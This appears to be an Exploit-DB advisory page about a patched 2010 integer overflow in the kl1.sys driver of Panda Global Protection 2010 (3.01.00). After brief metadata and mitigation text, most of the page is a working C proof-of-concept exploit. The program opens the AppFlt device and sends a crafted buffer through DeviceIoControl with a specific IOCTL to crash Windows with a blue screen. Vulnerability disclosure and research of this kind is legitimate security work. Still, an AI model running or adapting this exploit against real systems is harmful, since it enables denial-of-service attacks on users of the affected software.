Panda Global Protection 2010 (3.01.00) Integer Overflow Vulnerability

vendor:
Panda Global Protection
by:
Heurs
7.5
CVSS
HIGH
Integer Overflow
190
CWE
Product Name: Panda Global Protection
Affected Version From: Panda Global Protection 2010 (3.01.00)
Affected Version To: Panda Global Protection 2010 (3.01.00)
Patch Exists: YES
Related CWE:
CPE: a:panda_security:panda_global_protection:3.01.00
Metasploit:
Other Scripts:
Platforms Tested: Windows
2010
Panda Global Protection 2010 (3.01.00) Integer Overflow Vulnerability

kl1.sys driver in Panda Global Protection 2010 (3.01.00) does not check inputs integer of an IOCTL, allowing an exception to be thrown if one DWORD is modified. This can lead to a BSOD (Blue Screen of Death).
Mitigation:

The vulnerability has been patched in Panda Global Protection 2010 (3.01.00). Users are advised to update to the latest version.
Source
Exploit-DB raw data:

#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>

/*
Program          : Panda Global Protection 2010 (3.01.00)
Homepage         : http://www.pandasecurity.com
Discovery        : 2010/04/09
Author Contacted : 2010/07/15
Status of vuln   : Patched !
Found by         : Heurs
This Advisory    : Heurs
Contact          : s.leberre@sysdream.com


//----- Application description


Antivirus Global Protection 2010 is the most complete product, with everything
you need to protect your computer and information. It protects you from viruses,
spyware, rootkits, hackers, online fraud, identity theft and all other Internet
threats. The anti-spam engine will keep your inbox free from junk mail while the
Parental Control feature will keep your family safe when using the Internet. You
can also back up important files (documents, music, photos, etc.) to a CD/DVD or
online (5GB free space available) and restore them in case of accidental loss or
damage. And thanks to the most innovative and new detection technologies and improved
Collective Intelligence, the solution is now much faster than previous versions. 

//----- Description of vulnerability

kl1.sys driver don't check inputs integer of an IOCTL. An exception can be 
thrown if we modify one DWORD.
With my test I can't do best exploitation than a BSOD.

//----- Credits

http://www.sysdream.com
http://www.hackinparis.com/
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

//----- Greetings

Mysterie

*/

int __cdecl main(int argc, char* argv[])
{
    HANDLE hDevice = (HANDLE) 0xffffffff;
    DWORD NombreByte;
    DWORD Crashing[] = {
0xaaaaaaaa, 0xbbbbbbbb, 0xcccccccc, 0xdddddddd,
0xeeeeeeee, 0x00000000, 0x001cfdea, 0x002dc6c0,
0x000000a8, 0x0044005c, 0x00760065, 0x00630069,
0x005c0065, 0x00610048, 0x00640072, 0x00690064,
0x006b0073, 0x006f0056, 0x0075006c, 0x0065006d,
0x005c0031, 0x00720050, 0x0067006f, 0x00610072,
0x0020006d, 0x00690046, 0x0065006c, 0x005c0073,
0x00610050, 0x0064006e, 0x00200061, 0x00650053,
0x00750063, 0x00690072, 0x00790074, 0x0050005c,
0x006e0061, 0x00610064, 0x00470020, 0x006f006c,
0x00610062, 0x0020006c, 0x00720050, 0x0074006f,
0x00630065, 0x00690074, 0x006e006f, 0x00320020,
0x00310030, 0x005c0030, 0x00650057, 0x00500062,
0x006f0072, 0x00790078, 0x0065002e, 0x00650078,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161
        };
    char out[sizeof(Crashing)];
    
    printf("Local DoS - Panda Global Protection 2010 (3.01.00)\n\n");
    hDevice = CreateFile("\\\\.\\AppFlt",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
    
    DeviceIoControl(hDevice,0x06660d4c,Crashing,sizeof(Crashing),out,sizeof(Crashing),&NombreByte,NULL);
    
    printf("Sploit Send.\nhDevice = %x\n", hDevice);
    CloseHandle(hDevice);
    getch();
    return 0;
}